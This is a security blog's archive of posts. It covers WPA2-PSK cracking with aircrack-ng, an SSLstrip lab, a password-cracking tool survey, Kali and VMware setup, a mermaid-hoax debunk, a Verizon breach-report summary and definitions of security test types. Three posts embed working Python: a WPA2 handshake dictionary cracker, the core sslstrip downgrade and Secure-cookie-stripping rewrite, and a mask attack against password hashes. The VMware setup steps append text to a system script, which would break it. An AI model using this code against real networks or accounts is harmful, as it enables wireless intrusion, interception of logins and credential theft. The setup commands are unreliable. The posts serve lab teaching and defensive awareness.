Category Archives: General Security

Various security topics

Breaking WPA2-PSK with Kali Linux : wireless.

Great post by Aamir Lakhani on breaking WPA2-PSK. The original can be found HERE.

WPA2-PSK may not be as safe as you think. There are a few attacks against WPA2-PSK; one of the most common is exploiting a weak passphrase.

Below you will find a few easy steps on how to break WPA2 with a weak passphrase.

Breaking the Wireless Lab home network:

I set up a test network for this blog article. The client box is connecting to my Wireless Lab test network. This is the network we will break.


Step 1:

The first step is to verify the router configuration. Normally in a real penetration test we would not have this option, but since this is a home lab I have a little more flexibility.

In this case the lab access point is securing the wireless network Wireless Lab with WPA2-PSK. It is using the passphrase Cisco123. You can use any wireless router to set up your wireless lab.


Step 2:

We will be using Kali Linux to complete this task. Kali will need a wireless card configured before it can be used by the operating system. I am using the Alfa AWUS051NH adapter. Almost any Alfa wireless adapter will work. I am a big fan of the AWUS051NH because it is a dual-band adapter. However, this card is very difficult to obtain since it is no longer sold.


The iwconfig command will show any wireless cards in the system. I am using a Realtek wireless card. Linux ships with the Realtek drivers, making it a plug-and-play wireless card under Linux.

The operating system recognizes a wireless interface named wlan0.


Step 3:

My next step is to enable the wireless interface. This is accomplished by issuing the command ifconfig wlan0 up.


Step 4:

I need to see which wireless networks my wireless card can detect. I issue the command iwlist wlan0 scanning.


This command forces the wireless card to scan and report on all wireless networks in the vicinity.

You can see from this example it found my target network: Wireless Lab. It also found the MAC address of my access point: 0E:18:1A:36:D6:22. This is important to note because I want to limit my attack to this specific access point (to ensure we are not attacking or breaking anyone else’s password).

Secondly, we see the AP is transmitting on channel 36. This matters because it lets us tell our wireless card exactly which channel to monitor and capture traffic from. Channel 36 is in the 5 GHz band, which is why the adapter needs to be dual-band: a 2.4 GHz-only card would never see this network.


Step 5:

The next step is to put the wireless card into monitor mode. This allows the wireless card to examine all the packets in the air rather than only those addressed to it.

We do this by creating a monitor interface using airmon-ng. Issue the airmon-ng command to verify airmon-ng sees your wireless card. From that point create the monitor interface by issuing the command: airmon-ng start wlan0


Next, run the ifconfig command to verify the monitor interface was created; here it is mon0. Newer aircrack-ng releases name the monitor interface wlan0mon instead, so use whatever name airmon-ng reports in the commands that follow.

Step 6:

Use airodump-ng to capture the WPA2 handshake. The attacker has to catch a client in the act of authenticating to get a valid capture. Airodump-ng will display a confirmation in the upper right-hand corner of the screen when it captures a valid handshake.

Note: We will manually connect to the wireless network to force a handshake. In a future post I will show you how to force a deauthentication so that a device automatically disconnects and reconnects without any manual intervention.

We used the following command, where --bssid limits the capture to our AP, --channel keeps the card on one channel instead of hopping, and --write names the capture file:

airodump-ng mon0 --bssid 0E:18:1A:36:D6:22 --channel 36 --write BreakingWPA2

(each option takes a double hyphen, with no space between the two hyphens)


To capture the handshake you depend on observing a legitimate client authenticating to the network. However, that does not mean you have to wait for a client to authenticate on its own. You can force a client to re-authenticate, which happens automatically with most clients when you send it a deauthentication.

When you see “WPA handshake” in the airodump-ng output, you know you have captured a valid handshake.

Step 7:

We will use aircrack-ng with a dictionary file to crack the password. Your chances of breaking the password depend on the quality of the dictionary file.


The command is: aircrack-ng -w <dictionary file> <capture file>, for example aircrack-ng -w sample.lst BreakingWPA2-01.cap. If the capture contains more than one network, add -b <BSSID> so that aircrack-ng only works on the target access point.

The BreakingWPA2-01.cap file was created when we ran the airodump-ng command. The valid WPA2 handshake airodump captured is stored in the BreakingWPA2-01.cap file.

BackTrack 5 ships with a basic dictionary. The dictionary file darkc0de.lst is a popular wordlist that ships with BackTrack 5. We added our password Cisco123 to this file to make the test run a little smoother.

Many attackers use large dictionaries that increase their chances of cracking passwords. Many dictionaries contain passwords from real users and websites that have been cracked and posted on the Internet. Some sophisticated dictionaries combine multiple languages, permutations of each word, and keywords and phrases from social media sites such as Twitter and Facebook.

Kali does not come with darkc0de.lst, but you can download it from here.

In this blog we created a file named “sample.lst” and added the word Cisco123 in it.

Success:

If the password is found in the dictionary file then Aircrack-ng will crack it.
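To make clear what aircrack-ng is actually doing with the capture file, here is an added example (my code, not aircrack-ng's and not part of the original post) that derives the PMK and PTK exactly as WPA2-PSK does and checks each dictionary candidate against the MIC of the handshake's second message. The SSID, BSSID and passphrase are the ones from the lab above; the client MAC, nonces, EAPOL frame and wordlist are constructed for the example so that it runs offline.

```python
import hashlib
import hmac
from typing import Iterable, Optional

# Offset of the 16-byte Key MIC field inside an EAPOL-Key frame
# (802.1X header 4 bytes + descriptor fields up to the MIC: 81 bytes).
MIC_OFFSET = 81
MIC_LEN = 16


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The 4096 iterations are the only thing slowing a dictionary attack down,
    and the PMK depends on the SSID only, so it can be precomputed per SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512 from IEEE 802.11: the 64-byte PTK of the pairwise key expansion.
    aa/spa are the AP and client MAC addresses as 6 raw bytes."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    label = b"Pairwise key expansion"
    out = b""
    for i in range(4):  # 4 x 20 bytes of HMAC-SHA1 output, truncated to 64
        out += hmac.new(pmk, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """Key MIC over the EAPOL-Key frame with its MIC field zeroed.
    WPA2/CCMP uses key descriptor version 2: HMAC-SHA1 truncated to 16 bytes."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * MIC_LEN + eapol[MIC_OFFSET + MIC_LEN:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:MIC_LEN]


def crack_handshake(ssid: str, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes,
                    eapol: bytes, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack: derive PMK -> PTK -> KCK per candidate and compare MICs."""
    target_mic = eapol[MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    for candidate in wordlist:
        kck = ptk_from_pmk(pmk_from_passphrase(candidate, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol), target_mic):
            return candidate
    return None


def build_message2(passphrase: str, ssid: str, aa: bytes, spa: bytes,
                   anonce: bytes, snonce: bytes) -> bytes:
    """Constructed EAPOL-Key message 2 (client -> AP) with a valid MIC, standing in
    for the frame airodump-ng would write to BreakingWPA2-01.cap."""
    frame = bytearray()
    frame += b"\x02\x03" + (95).to_bytes(2, "big")      # 802.1X v2, type EAPOL-Key, body length
    frame += b"\x02"                                    # descriptor type: RSN
    frame += b"\x01\x0a"                                # key info: MIC set, pairwise, version 2
    frame += b"\x00\x10"                                # key length: 16 (CCMP)
    frame += (1).to_bytes(8, "big")                     # replay counter
    frame += snonce                                     # key nonce (SNonce in message 2)
    frame += b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # key IV, RSC, key ID
    frame += b"\x00" * MIC_LEN                          # MIC placeholder (offset 81)
    frame += b"\x00\x00"                                # key data length
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    frame[MIC_OFFSET:MIC_OFFSET + MIC_LEN] = eapol_mic(kck, bytes(frame))
    return bytes(frame)


# Lab values from the post: SSID, AP BSSID and passphrase.  The client MAC,
# nonces and wordlist are made up for this example.
SSID = "Wireless Lab"
AP_MAC = bytes.fromhex("0E181A36D622")
CLIENT_MAC = bytes.fromhex("001122334455")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
WORDLIST = ["password", "12345678", "wirelesslab", "Cisco123"]  # constructed sample.lst

MESSAGE2 = build_message2("Cisco123", SSID, AP_MAC, CLIENT_MAC, ANONCE, SNONCE)


def run_demo(wordlist: Iterable[str] = WORDLIST) -> Optional[str]:
    """Run the dictionary attack against the constructed handshake."""
    return crack_handshake(SSID, AP_MAC, CLIENT_MAC, ANONCE, SNONCE, MESSAGE2, wordlist)


if __name__ == "__main__":
    print("KEY FOUND:", run_demo())
```

Two things follow from the derivation. Because the PMK depends only on the passphrase and the SSID, an attacker can precompute PMKs for common SSIDs once and reuse them against every capture (airolib-ng in the aircrack-ng suite does exactly this), so a unique SSID removes that shortcut. And because each guess costs only 4096 HMAC-SHA1 iterations, the passphrase length and randomness are the real defense; a dictionary word with a number appended is found in seconds.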



Filed under General Security

Are Mermaids, Aliens and Vampires Real? Researching Bogus Stories


There are documentaries popping up that showcase outrageous claims, such as the government hiding captured mermaids or encounters with aliens. I’ve heard friends and coworkers talk about such things around the water cooler, believing the stories are real based on fake videos and actors posing as specialists. Movies like The Blair Witch Project and The Fourth Kind present fictional stories as documentaries; however, most people figured out they are not real because they were released in major movie theaters. Some documentaries shown on TV networks display “A Speculative Documentary”, which doesn’t clearly communicate that the footage is fictional.

A recent example of a fake documentary is MERMAIDS: THE NEW EVIDENCE, which claims mermaids are real. The documentary has been shown on the Discovery Channel and Animal Planet side by side with real documentaries, making it seem credible. The documentary includes camera footage of a mermaid found on a beach as well as research by various specialists. The film claims mermaids are hiding in deep ocean waters to avoid military sonar that causes brain hemorrhaging in some aquatic life. At first glance, the concept seems plausible to some people.

I decided to show the research used to qualify documentaries such as this. Here are some steps that prove Mermaids: The New Evidence is fake.

Step 1: General Research


Google is your friend. In many cases you will find general conversations about a subject that lead to evidence of the truth. A Google search on the mermaid film shows a number of people pointing out that the film is not real. Wikipedia had the passage above confirming the film is fake. This research exercise pretty much sealed the deal (and took less than a minute); however, I continued gathering evidence in case the general public as well as Wikipedia were wrong (which sometimes happens).

Step 2: Look At The Website


There is a website associated with the documentary, believeinmermaids.com, that displays a notice saying the Department of Justice has seized all evidence of mermaids presented in the film. Why the DOJ would violate freedom of speech in this manner is beyond me; however, let’s investigate this website.

The first thing to check is the website’s history using the Wayback Machine at http://archive.org/web/web.php. The Wayback Machine shows the entire lifespan of a website and the changes made to it. This website was created in 2012, which happens to be around when the documentary was filmed. If you select the first snapshot (April 1st) to show the first version of the website, it shows the DOJ warning has been the only thing displayed since day 1.


The next question is who owns the website. Looking at the WHOIS information at http://whois.net/, I can see believeinmermaids.com is owned by Discovery Communications, LLC. OK, so the Discovery Channel created the believeinmermaids site the week of filming. It is pretty obvious it was created to drive viewers to the film rather than being a real website featuring controversial evidence.


Step 3: Research People

The mermaid documentary featured lots of evidence from a few scientists, including Dr. Paul Robinson. Usually a marine biologist seen on TV would have lots of published, credible information; however, searching “Dr. Paul Robinson marine biologist” turned up the actor’s real name, Andre Weideman. Searching for Andre Weideman confirmed his role in the fake mermaid documentary.


Hopefully this post educates people on how to qualify claims before believing anything told by public networks. Similar research tactics should be used when considering questionable specialists such as psychic mediums, or historical events that seem fishy. Knowing is half the battle.


Filed under General Security

Kali Linux – The next generation for BackTrack


Written by Aamir Lakhani, www.DrChaos.com and Joey Muniz www.thesecurityblogger.com. Article is cross posted.

BackTrack is a digital forensics and penetration testing arsenal used by many security professionals and malicious hackers. The last release of BackTrack was 5 R3, and many expected a new release sometime in 2013. Instead, the creators of BackTrack decided to start from the ground up, building a full-fledged operating system and releasing a next-generation penetration testing distribution rather than updating the existing live CD release. The creators note: “Kali Linux is a more mature, secure and enterprise-ready version of BackTrack Linux”.

Lifeline of BackTrack ending with Kali 1.0

Kali Linux has many advantages over BackTrack. Kali comes with more up-to-date tools: the tools are streamlined with the Debian repositories and synchronized four times a day, which means users get the latest package updates and security fixes. The new FHS-compliant file system means most tools can be run from anywhere on the system. Kali has also made customization, unattended installation and flexible desktop environments strong features.

Kali Linux offers a number of customized tools designed for penetration testing. Tools are categorized in the following groups as seen in dropdown menu shown below.


Main Tool Categories in Kali Linux

Most of the useful tools from BackTrack made it into Kali with updated versions, along with some new ones. For example, Vega and ProxyStrike are updated, while tools like Grendel-Scan were removed. One interesting catalog entry is the separate Top 10 Security Tools listing.


Top 10 Security Tools in Kali Catalog

Kali Linux does have some limitations compared to its predecessor BackTrack. Some tools do not operate correctly in the new environment or require customization to become stable. Some of these limitations will probably be fixed in updates. Within a few minutes of using Kali, we realized that the darkc0de.lst dictionary file wasn’t included with Kali, and that SET needed some reconfiguration for updates to work. Most of these gotchas are well documented, and a simple Google search will get you to the right place.

Sticking with the last release, BackTrack 5 R3, has some advantages, such as more streamlined installation options on various platforms. One huge limitation for Kali is support in a large VMware ESXi server environment, because VMware Tools does not run on the 64-bit version of Kali out of the box. There is a workaround using 32-bit images with VMware Tools preinstalled that can be downloaded from the Kali website. If you want to install VMware Tools natively on the Kali Linux ISO (including 64-bit versions of the ISO), then check out our HowTo Install VMware Tools On Kali Linux.

BackTrack also has much more content available online, as a veteran compared to Kali’s 1.0 release.

So far I like the new platform and have been using it for multiple projects. I haven’t had issues running Kali on a MacBook Pro under VMware Fusion, or on a Mac mini hosting ESXi 5.1 (note that the Mac mini operates like a desktop, therefore avoiding the issues found with ESXi server farms). I recommend checking out the new release at http://www.kali.org/.

Aamir Lakhani (www.DrChaos.Com) and Joey Muniz (www.thesecurityblogger.com) are co-writing a new book on Kali for Web Penetration Testing.  Stay tuned for details!


Filed under General Security

Installing VMware Tools on Kali Linux

Great find and post by Aamir Lakhani. Check out the original HERE

If you are using Kali Linux as a guest operating system on VMware, you may run into some issues. It is recommended that you install VMware Tools on Kali Linux.

This guide will help you install VM Tools on any installation of Kali Linux (including 64-bit ISOs). It will also allow you to use Kali Linux in VMware ESXi environments.

The first thing you need to do on Kali Linux is prep the system for VM Tools. You do so by issuing the following commands:

Note: all commands are typed as one line in the terminal

  •  echo cups enabled >> /usr/sbin/update-rc.d
  • echo vmware-tools enabled >> /usr/sbin/update-rc.d
  • apt-get install gcc make linux-headers-$(uname -r)


Note: This is typed as one line

ln -s /usr/src/linux-headers-$(uname -r)/include/generated/uapi/linux/version.h /usr/src/linux-headers-$(uname -r)/include/linux/


Now you are ready to mount the VMware Tools CD. Simply go to the VMware menu and choose Install VMware Tools.

Now go back to Kali Linux and use the following commands:

  • mkdir /mnt/vmware
  • mount /dev/cdrom /mnt/vmware/
  • cp -rf /mnt/vmware/VMwareTools* /tmp/


Next, you will change to the /tmp directory and run the VM Tools installation script.

  • cd /tmp/
  • tar zxpf VMwareTools-*.tar.gz
  • cd vmware-tools-distrib/


Lastly, type ./vmware-install.pl to run the VMware Tools installation script (that is the name of the script inside vmware-tools-distrib). Follow the on-screen instructions when you run the script.

What is Kali Linux and how is it different from BackTrack? Check out our Kali Linux introduction on www.DrChaos.com.


Filed under General Security

SSL Strip – Breaking Secure Websites

Aamir Lakhani wrote an overview of how to perform an SSL strip attack. The original post can be found HERE.

SSLSTRIP LAB

Before beginning the lab, make sure you have the BackTrack 5 R3 VM imported into VMware Player/Workstation/Server/Fusion, or whatever virtual machine environment you have chosen to use.

The following is an excerpt from the “Getting Started with VMware Player” guide for VMware Player 4.0.

Import an Open Virtualization Format Virtual Machine

You can import an Open Virtualization Format (OVF) virtual machine and run it in Player. Player converts the virtual machine from OVF format to VMware runtime (.vmx) format. You can import both .ovf and .ova files.

OVF is a platform-independent, efficient, extensible, and open packaging and distribution format for virtual machines. For example, you can import OVF virtual machines exported from VMware Fusion into Player. You can import OVF 1.0 and later files only.

You can also use the standalone OVF Tool to convert an OVF virtual machine to VMware runtime format. The standalone version of the OVF Tool is installed in the Player installation directory under OVFTool. See the OVF Tool User Guide on the VMware Web site for information on using the OVF Tool.

Procedure

  1. In Player, select File > Open a Virtual Machine.
  2. Browse to the .ovf or .ova file and click Open.
  3. Type a name for the virtual machine, type or browse to the directory for the virtual machine files, and click Import. Player performs OVF specification conformance and virtual hardware compliance checks. A status bar indicates the progress of the import process.
  4. If the import fails, click Retry to try again, or click Cancel to cancel the import.

If you retry the import, Player relaxes the OVF specification conformance and virtual hardware compliance checks and you might not be able to use the virtual machine in Player.

After Player successfully imports the OVF virtual machine, the virtual machine appears in the virtual machine library.

Your Lab

In this lab, we are using virtual-machine-based attack hosts. The hosts are Linux-based BackTrack 5 R3 (based on Ubuntu Linux). The reason for using BackTrack is that all of the modules and associated dependencies for this lab are preloaded with the distribution. The module dependencies for SSLStrip are (already loaded with BackTrack):

  • Python >= 2.5 (apt-get install python)
  • The python “twisted-web” module (apt-get install python-twisted-web)

Additionally to utilize SSLSTRIP you need (Again already in Backtrack):

  • Arpspoof or Ettercap (this lab we use Arpspoof, Ettercap has issues with wireless)
  • IPChains / IPtables
  • Netstat

Additionally, when using BackTrack or any Ubuntu-based distribution, it is a good idea to run APT to update the existing packages. BackTrack has several custom distribution repositories preconfigured.

# Use this command to update: apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y

Getting Started

Once your Backtrack virtual machine is installed and booted use the following credentials to log in:

Username: root
Password: toor

Start the desktop environment by issuing the startx command from the terminal session:


Note: It is not mandatory that you utilize a GUI desktop.  But for the purposes of this lab it is recommended.  Those not as familiar working in a Linux command shell will likely find it simpler to switch between the multiple terminal windows needed to perform the upcoming operations.

You should now see an environment similar to the following:


For the purposes of this lab we will only be using a single interface; your virtual machine might be configured with multiple Ethernet interfaces. We need to check whether more than one (virtual) Ethernet interface is enabled.

In the upper left hand corner of the desktop click on the Xterm link.


When you see a terminal window open on the desktop you are ready to continue.

  1. Use ifconfig to determine which interfaces are on the virtual machine:

ifconfig | grep "eth"

This command filters out everything else and shows only the Ethernet interfaces, like below.


If we do indeed have more than one interface enabled, issue the ifdown command with the interface name to disable it. If there is an interface named eth1, as shown above, issue the command:

ifdown eth1

The output should be like what is shown below.

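The lab excerpt stops before the attack itself, so here is an added example (my code, not sslstrip's and not part of the original lab) of the core rewrite sslstrip performs once it sits between the victim and the web server: every https:// link or redirect in the server's response becomes http:// on its way to the victim, the Secure flag is dropped from cookies so the browser will still send them, and the stripped hosts are remembered so that the victim's later plain-HTTP requests can be upgraded back to HTTPS toward the real server. It also includes the check a defender relies on: a host that has previously sent the victim's browser a Strict-Transport-Security header (HSTS) cannot be downgraded this way, because the browser upgrades the request before it ever leaves the machine. The HTML and headers are constructed sample data.

```python
import re
from typing import Dict, Set, Tuple

HTTPS_LINK = re.compile(r"https://([A-Za-z0-9.-]+)", re.IGNORECASE)


def strip_response(headers: Dict[str, str], body: str,
                   stripped: Set[str]) -> Tuple[Dict[str, str], str]:
    """Downgrade one server response on its way to the victim: every https:// link
    in the body and any https:// redirect becomes http://, and the host is recorded
    in `stripped` so later client requests for it are sent upstream over TLS."""
    def downgrade(match: "re.Match") -> str:
        stripped.add(match.group(1).lower())
        return "http://" + match.group(1)

    new_headers = dict(headers)
    if "Location" in new_headers:
        new_headers["Location"] = HTTPS_LINK.sub(downgrade, new_headers["Location"])
    # A cookie marked Secure would never be sent back over plain HTTP,
    # so the flag is removed before the response reaches the browser.
    if "Set-Cookie" in new_headers:
        new_headers["Set-Cookie"] = re.sub(r";\s*secure", "", new_headers["Set-Cookie"],
                                           flags=re.IGNORECASE)
    return new_headers, HTTPS_LINK.sub(downgrade, body)


def upstream_scheme(host: str, stripped: Set[str]) -> str:
    """Scheme the attacker uses toward the real server for a victim request to host:
    hosts that were stripped are contacted over HTTPS so the site behaves normally."""
    return "https" if host.lower() in stripped else "http"


def hsts_protected(headers: Dict[str, str]) -> bool:
    """True if the response carries a Strict-Transport-Security header with a
    non-zero max-age. A browser that has cached it (or has the host preloaded)
    will not issue a plain-HTTP request to this host, so there is nothing to strip."""
    hsts = headers.get("Strict-Transport-Security", "")
    m = re.search(r"max-age\s*=\s*(\d+)", hsts, re.IGNORECASE)
    return bool(m) and int(m.group(1)) > 0


# Constructed sample response from a login page (not captured traffic).
SAMPLE_HEADERS = {
    "Content-Type": "text/html",
    "Set-Cookie": "session=abc123; Path=/; Secure; HttpOnly",
}
SAMPLE_BODY = (
    '<a href="https://bank.example/login">Log in</a> '
    '<form action="https://bank.example/auth" method="post"></form> '
    '<a href="http://news.example/">news</a>'
)


def run_demo() -> dict:
    """Strip the sample response and report what the victim would now see."""
    stripped: Set[str] = set()
    headers, body = strip_response(SAMPLE_HEADERS, SAMPLE_BODY, stripped)
    return {
        "body": body,
        "cookie": headers["Set-Cookie"],
        "stripped": sorted(stripped),
        "upstream_bank": upstream_scheme("bank.example", stripped),
        "upstream_news": upstream_scheme("news.example", stripped),
        "hsts_blocks": hsts_protected(
            {"Strict-Transport-Security": "max-age=31536000; includeSubDomains"}),
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, value)
```

The ARP spoofing and iptables redirect listed in the dependencies above only put the attacker in the path; the rewrite is what keeps the victim on plain HTTP while the attacker speaks HTTPS to the real site. HSTS is the standard countermeasure, which is why the check is included here.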


Filed under General Security

How Hackers Crack Weak Passwords

People use weak password practices to secure critical information. Weak password practices include using the same password for multiple systems regardless of the value of the asset, using dictionary words or short phrases, and keeping the same passwords for extended periods of time. For example, it’s common to find that the password on a non-critical asset such as a PlayStation 3 is the same as a person’s bank account login.

The more information an attacker knows about your password profile, the more likely they are to crack your password. For example, a policy of “6-10 characters with one upper-case letter and one special character” actually helps an attacker reduce the search space, meaning passwords are weaker with the policy than without it. If a hacker captures a password for another system and notices a formula such as ‘<dictionary word>’ followed by ‘<3 numbers>’, it helps the attacker prepare a dictionary attack (utilities such as Crunch make this easy). Any password shorter than 10 characters is an easy target for a brute-force attack with today’s processing power.

Here are some tools that hackers can use to crack your passwords.


John the Ripper is an old-school yet powerful password cracking utility. It has several engines that can crack different types of passwords, including encrypted passwords and hashes. John can detect most hash types automatically (about 90% accurate) and generates matching hashes from candidate passphrases to compare against the captured ones. Attackers like John the Ripper because it’s very customizable.

John the Ripper cracked 3 passwords from a Linux shadow file.


Hashcat is a password cracking utility. Hashcat is multi-threaded, meaning it can handle multiple hashes and password lists during a single attack session. Hashcat offers many attack options such as brute-force, combinator, dictionary, hybrid, mask and rule-based attacks.


Hashcat GUI

Ophcrack

Ophcrack is a Windows password cracker based on rainbow tables (rainbow tables are precomputed hash tables). Ophcrack can import hashes in a variety of formats, including dumping directly from the SAM file of Microsoft Windows.


Ophcrack Cracking Hashes

Findmyhash

Findmyhash is a Python script that uses free online services to crack hashes. Findmyhash checks the hash against the rainbow tables of multiple websites.

Findmyhash running an MD5 hash against multiple websites

Crunch

Crunch is a tool used to generate password lists. This can be extremely helpful if you are able to gather intelligence on how your target creates passwords. For example, if you capture two passwords and notice the target uses a phrase followed by random digits, Crunch can quickly generate a list of that phrase followed by every possible digit combination. It is the perfect tool for defeating company password policies!

Creating a password list for the word “pass” followed by any two digits

Crunch output: list of all combinations of “pass” and two digits
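As an added example (my code, not Crunch's or hashcat's, and not part of the original post), the following Python shows the two ideas of this post in working form: how a disclosed password policy or an observed pattern shrinks the search space, and a mask attack in the style of Crunch and hashcat that enumerates “pass” followed by two digits (or a word followed by three digits) and tests each candidate against a hash. The target hashes are constructed inline from known passwords so the example checks itself; in practice they would come from a dumped hash file.

```python
import hashlib
import itertools
import string
from typing import Iterable, Iterator, Optional

# hashcat-style mask placeholders (Crunch uses @ , % ^ for the same four classes)
CHARSETS = {
    "l": string.ascii_lowercase,   # 26
    "u": string.ascii_uppercase,   # 26
    "d": string.digits,            # 10
    "s": string.punctuation,       # 32 printable specials
}


def policy_keyspace(length: int, lower: int = 26, upper: int = 26,
                    digits: int = 10, special: int = 32) -> int:
    """Number of passwords of the given length that satisfy 'at least one upper-case
    letter and at least one special character', by inclusion-exclusion.
    Compare with total**length to see how much a published policy gives away."""
    total = lower + upper + digits + special
    return (total ** length
            - (total - upper) ** length
            - (total - special) ** length
            + (total - upper - special) ** length)


def expand_mask(mask: str) -> Iterator[str]:
    """Enumerate every candidate matching a mask such as 'pass?d?d' or '?u?l?l?l?d?d?d'.
    Literal characters are kept; '?x' expands to the character class x."""
    slots = []
    i = 0
    while i < len(mask):
        if mask[i] == "?" and i + 1 < len(mask) and mask[i + 1] in CHARSETS:
            slots.append(CHARSETS[mask[i + 1]])
            i += 2
        else:
            slots.append(mask[i])
            i += 1
    for combo in itertools.product(*slots):
        yield "".join(combo)


def word_plus_digits(words: Iterable[str], ndigits: int) -> Iterator[str]:
    """The '<dictionary word> followed by <n numbers>' formula from the post."""
    for word in words:
        yield from expand_mask(word + "?d" * ndigits)


def crack_hash(target_hex: str, candidates: Iterable[str], algo: str = "md5") -> Optional[str]:
    """Hash each candidate with the named hashlib algorithm and stop at the first match."""
    for pw in candidates:
        if hashlib.new(algo, pw.encode()).hexdigest() == target_hex:
            return pw
    return None


# Constructed targets: MD5 of 'pass42' and of 'Cisco123' stand in for hashes
# recovered from a real system.
TARGET_PASS42 = hashlib.md5(b"pass42").hexdigest()
TARGET_CISCO = hashlib.md5(b"Cisco123").hexdigest()


def run_demo() -> dict:
    """Mask attack, formula attack, and the keyspace a policy leaves an attacker."""
    return {
        "mask_hit": crack_hash(TARGET_PASS42, expand_mask("pass?d?d")),        # 100 candidates
        "formula_hit": crack_hash(TARGET_CISCO, word_plus_digits(["cisco", "Cisco"], 3)),
        "policy_8": policy_keyspace(8),
        "unconstrained_8": 94 ** 8,
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, value)
```

The keyspace function makes the policy point concrete: every rule of the form “must contain at least one X” removes candidates rather than adding them, and a pattern learned from one leaked password (word plus three digits) collapses the search to a few thousand guesses regardless of what the policy says.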

Chntpw

An alternative to breaking a Windows password is bypassing it completely. Chntpw is a utility that can reset or remove a Windows password. This gives a hacker who has offline access to your Windows SAM file (for example, by booting the machine from live media) the ability to obtain administrator privileges.

Chntpw options. Option 1 clears the password.

There are many tools available to break weak passwords. Best practice is to use a password longer than 10 characters (even a repeated character at the end helps!), avoid dictionary words, change your password periodically, don’t reuse passwords between secure and non-secure sites, and don’t use a computer that accesses sensitive data for personal use (i.e. the same system for Facebook and for configuring routers). I suggest using the first letter of each word of a long sentence, so you can remember the password while the output looks random. Hope this helps. All tools shown are free and available on BackTrack / Kali.


Filed under General Security, Penetration / Hacking

Verizon’s 2013 Data Breach Investigations Report

Verizon recently released their annual Data Breach Investigations Report (download HERE). This report is based on statistics from 19 organizations and showcases 621 confirmed data breaches and 47,000 security incidents, with the goal of educating the public about the current risks from cyber threats. All results are built from first-hand evidence collected during paid external forensic investigations and related intelligence operations conducted by Verizon from 2004 through 2012.

There are a lot of interesting findings, ranging from the most common attacks to the most popular targets. According to the report, everybody is a target. The report states, “from pubs to public agencies, mom-and-pops to multi-nationals, nobody was immune”. Some attacks had success rates as high as 95%, such as phishing, meaning “most attackers would be able to slap a ‘guaranteed’ sticker on getting a click”. They even call out that most organizations should assume they are already compromised.

To break things down, here are some highlights:

  • Who are the targets? Everybody.
  • Who is perpetrating breaches? The majority of attacks are by outsiders (92%); however, insiders are on the rise (14%).
  • How do breaches occur? 76% were based on weak or stolen credentials, followed by hacking (52%) and malware (40%).
  • How sophisticated are the attacks? On a range from High to Very Low, the majority of initial breaches leveraged Low-difficulty attacks. I like how they put it: “Would you fire a guided missile at an unlocked screen door?”
  • Who are the criminals? Organized crime made up the majority of external attacks (over 50%), while the other groups each fell around 20% or less.
  • The leader for espionage was China, while Romania, followed by the USA, led for financial crimes. Spyware (including keyloggers) is the common method for financial crimes, while multiple forms of malware are typical for espionage.
  • Social engineering dipped over the last two years but is up again in the 2012 data (29%).
  • Installing malware on compromised systems is still the most common vector.
  • ATM hacking was top of the list for physical crimes. I wonder if this was triggered by Barnaby Jack’s Black Hat talk.
  • 2/3 of the compromised data was data at rest, meaning on an asset like a database or file server. 1/3 was compromised while being processed, e.g. by RAM scrapers, skimmers and keyloggers. No data was compromised while in transit (i.e. by compromising a backbone router).


The Verizon report is another confirmation that cyber threats are very real and probably active inside your network. The report calls out that the most common attacks are easy to execute and have very high success rates (such as phishing campaigns). Standard security products that rely on signatures will not catch many of the threats called out in this report. The best way to identify these threats is to monitor behavior inside the network and to use a layered approach when building your security strategy.


Filed under General Security

Defining The Difference Between A Penetration Test, Vulnerability Assessment and Security Audit

The terms Penetration Test, Vulnerability Assessment and Security Audit are often blended together when requested by clients or offered by security service providers. All three have security aspects; however, they are very different regarding the purpose they serve as well as the expected deliverable.

A Security Audit typically means evaluating a system or application’s risk level against a set of standards or baselines. Standards are mandatory rules while baselines are the minimal acceptable level of security. Standards and baselines achieve consistency in security implementations and can be specific to industries, technologies and processes.

Most requests for Security Audits are focused on passing an official audit (i.e. preparing for a corporate or government audit) or proving the baseline requirements are met for a mandatory set of regulations (HIPAA, PCI, etc.). In many cases, Security Audit services do not include any guarantee or protection if an audit isn’t passed after the service, meaning the service only provides information that a client can use to become compliant.

IMPORTANT: In many cases, security audits give customers a false sense of security. Most standards and baselines have a long update process that is unable to keep up with the rapid changes in threats found in today’s cyber world. It is highly recommended to go beyond standards and baselines to raise the level of security to an acceptable level of protection for real world threats.

A Vulnerability Assessment is the process in which network devices, operating systems and application software are scanned in order to identify the presence of known vulnerabilities. A vulnerability is a gap, error or weakness in how a system is designed, used or protected. When a vulnerability is exploited, it can result in unauthorized access, escalation of privileges or denial of service against the asset.

Vulnerability Assessments typically stop once a vulnerability is found, meaning the service doesn’t include executing an attack against the vulnerability to verify whether it is real rather than a false positive. A Vulnerability Assessment deliverable lists the potential risk associated with each vulnerability found, with possible remediation steps. There are many tools that can scan for vulnerabilities based on system type, operating system, open ports and other characteristics. Vulnerability Assessments are a valuable way to assess a network for potential security weaknesses and to identify where to invest in future security.

A Penetration Test attempts to attack vulnerabilities in the same way a real malicious attacker would. Typically, penetration services are requested when a system or network has already received its security investments and the owner wants to verify that all avenues have been covered. The key difference between a Penetration Test and a Vulnerability Assessment is that a penetration test acts on the vulnerabilities found and verifies whether they are real, reducing the list to the confirmed risks associated with a target.

